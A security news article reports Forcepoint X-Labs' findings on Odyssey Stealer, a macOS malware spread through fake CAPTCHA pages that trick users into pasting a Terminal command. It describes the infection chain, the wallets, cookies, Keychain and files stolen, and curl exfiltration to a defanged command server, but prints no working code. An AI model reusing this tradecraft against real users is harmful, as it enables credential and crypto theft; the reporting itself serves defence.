New ‘Odyssey Stealer’ Malware Hijacks macOS, Steals Crypto with ClickFix
Researchers at Forcepoint X-Labs have identified a new malware campaign targeting macOS users. The attack employs an enhanced ClickFix technique—combining phishing with social engineering—to steal data from cryptocurrency wallets, browser accounts, and confidential files.
Discovered in August 2025, the malware—dubbed Odyssey Stealer—is an evolution of earlier ClickFix attacks previously aimed at Windows systems and is now deployed against Apple devices through fraudulent CAPTCHA verification pages.
Hosted on the domain tradingviewen[.]com, the scheme mimics a standard “I’m not a robot” check but first detects the user’s operating system to deliver tailored instructions. macOS users are prompted to open Spotlight Search, launch the Terminal, and paste a prewritten command. This command decodes a Base64-encoded string and then downloads and executes a heavily obfuscated AppleScript from a remote server. The process is disguised as a legitimate procedure—entering a “verification code” and the system password—while in reality granting the malware privileged access.
Once executed, the AppleScript performs extensive data exfiltration: harvesting contents from Electrum, Exodus, Litecoin, and Wasabi cryptocurrency wallets in Chromium-based browsers; extracting cookies, saved logins, autofill data, and form histories; copying .txt, .pdf, .docx, and .key documents from the desktop and Documents folder; and exporting Safari cookies, Apple Notes, and Keychain files. To further target crypto assets, it scans local storage and IndexedDB for wallet extensions and user profiles.
The malware employs multi-layered obfuscation and random string generation to hinder analysis. All collected data is packaged into /tmp/out.zip and exfiltrated to the command-and-control server 45.146.130[.]131/log via curl. The same host runs the Odyssey Stealer control panel, where stolen data is accessed by the attackers. After exfiltration, the malware deletes temporary directories and the archive to minimize forensic traces and complicate investigation.
Odyssey Stealer demonstrates how even familiar web interface elements can be weaponized for highly targeted attacks when used to manipulate the user—proving once again that macOS’s “impenetrable” security is no safeguard against the vulnerabilities of human behavior.
